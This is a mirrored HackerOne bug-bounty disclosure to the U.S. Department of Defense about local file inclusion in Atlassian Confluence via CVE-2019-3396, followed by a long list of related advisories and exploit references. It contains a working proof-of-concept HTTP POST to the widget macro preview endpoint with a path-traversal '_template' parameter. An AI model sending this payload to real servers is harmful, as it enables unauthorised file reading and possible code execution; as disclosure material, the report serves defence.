Lucene search
NahamsecH1:538771HistoryApr 15, 2019 - 7:06 p.m.
U.S. Dept Of Defense: LFI with potential to RCE on ██████ using CVE-2019-3396
2019-04-1519:06:19
nahamsec
hackerone.com
95
0.975 High
EPSS
Percentile
100.0%
#POC
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: ██████
Content-Type: application/json
Content-Length: 174
{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}
Thanks,
Ben
Impact
Related
nessus
nessus
Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection
2019-04-11 00:00:00
Atlassian Confluence < 6.6.12 Multiple Vulnerabilities
2019-07-17 00:00:00
Atlassian Confluence 6.7.x < 6.12.3 Multiple Vulnerabilities
2019-07-17 00:00:00
githubexploit
githubexploit
Exploit for Path Traversal in Atlassian Confluence
2019-04-09 06:20:51
Exploit for Path Traversal in Atlassian Confluence
2021-05-01 02:10:04
Exploit for Path Traversal in Atlassian Confluence
2021-02-01 16:10:27
nvd
nvd
CVE-2019-3396
2019-03-25 19:29:01
prion
prion
Path traversal
2019-03-25 19:29:00
cve
cve
CVE-2019-3396
2019-03-25 19:29:01
trendmicroblog
trendmicroblog
This Week in Security News: BEC Attacks and Botnet Malware
2019-05-03 14:00:25
This Week in Security News: Skimming Attacks and Ransomware
2019-05-10 13:00:42
hackerone
hackerone
Mail.ru: Path traversal, SSTI and RCE on a MailRu acquisition
2019-04-11 20:10:37
Mail.ru: RCE on shared.mail.ru due to "widget" plugin
2019-03-29 10:45:58
Mail.ru: [geekbrains.ru] CVE-2019-5418 Ruby on Rails File Content Disclosure
2019-04-18 08:32:11
fireeye
fireeye
GAME OVER: Detecting and Stopping an APT41 Operation
2019-08-19 00:00:00
checkpoint_advisories
checkpoint_advisories
Atlassian Confluence and Data Center Remote Code Execution (CVE-2019-3396)
2019-04-14 00:00:00
metasploit
metasploit
Atlassian Confluence Widget Connector Macro Velocity Template Injection
2019-04-11 12:55:51
nuclei
nuclei
Atlassian Confluence Server - Path Traversal
2020-07-07 07:24:27
packetstorm
packetstorm
Atlassian Confluence Widget Connector Macro Velocity Template Injection
2019-04-18 00:00:00
Atlassian Confluence 6.12.1 Template Injection
2021-01-22 00:00:00
attackerkb
attackerkb
CVE-2019-3396
2019-10-30 00:00:00
Confluence Unauthorized RCE Vulnerability
2019-03-25 00:00:00
threatpost
threatpost
Lazarus Group Surfaces with Advanced Malware Framework
2020-07-22 16:43:44
Hezbollah-Linked Lebanese Cedar APT Infiltrates Hundreds of Servers
2021-02-01 21:18:09
Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks
2020-10-21 20:31:17
securelist
securelist
MATA: Multi-platform targeted malware framework
2020-07-22 10:00:57
zdt
zdt
canvas
canvas
Immunity Canvas: CONFLUENCE_MACRO_LFI
2019-03-25 19:29:00
cisa_kev
cisa_kev
cvelist
cvelist
CVE-2019-3396
2019-03-20 00:00:00
dsquare
dsquare
Confluence File Disclosure
2019-03-28 00:00:00
exploitdb
exploitdb
Atlassian Confluence Widget Connector Macro - SSTI
2021-01-22 00:00:00
atlassian
atlassian
Remote code execution via Widget Connector macro - CVE-2019-3396
2019-02-28 03:02:04
SSRF via WebDAV endpoint - CVE-2019-3395
2019-02-27 22:52:13
Remote code execution via Widget Connector macro - CVE-2019-3396
2019-02-28 03:02:04
thn
thn
Hezbollah Hacker Group Targeted Telecoms, Hosting, ISPs Worldwide
2021-01-29 10:08:00
Top 30 Critical Security Vulnerabilities Most Exploited by Hackers
2021-07-29 08:21:00
qualysblog
qualysblog
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
2019-12-27 18:01:22
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
2020-10-22 23:10:29
ics
ics
Top Routinely Exploited Vulnerabilities
2021-08-20 12:00:00
Potential for China Cyber Response to Heightened U.S.–China Tensions
2020-10-20 12:00:00